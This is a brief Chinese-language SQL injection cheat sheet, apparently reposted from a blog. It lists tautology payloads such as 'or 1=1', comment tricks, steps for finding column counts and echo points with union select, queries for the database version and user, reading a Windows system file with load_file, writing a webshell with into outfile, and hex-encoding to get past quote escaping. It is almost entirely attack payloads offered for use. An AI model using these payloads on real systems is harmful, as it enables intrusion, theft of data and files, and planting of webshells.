where user_id = 1 or 1=1
where user_id = ‘1‘ or ‘1‘=‘1‘
where user_id =" 1 "or "1"="1"
# 单行注释 注意与url中的#区分,常编码为%23
--空格 单行注释 注意为短线短线空格
/*()*/ 多行注释 至少存在俩处的注入 /**/常用来作为空格
是否存在注入并且判断注入类型
判断字段数 order by
确定回显点 union select 1,2
查询数据库信息 @@version @@datadir
查询用户名,数据库名 user() database()
文件读取 union select 1,load_file(‘C:\\wondows\\win.ini‘)#
写入 webshell select..into outfile...
补充一点,使用sql注入遇到转义字符串的单引号或者双引号,可使用HEX编码绕过
原文:https://www.cnblogs.com/ihacker/p/11055191.html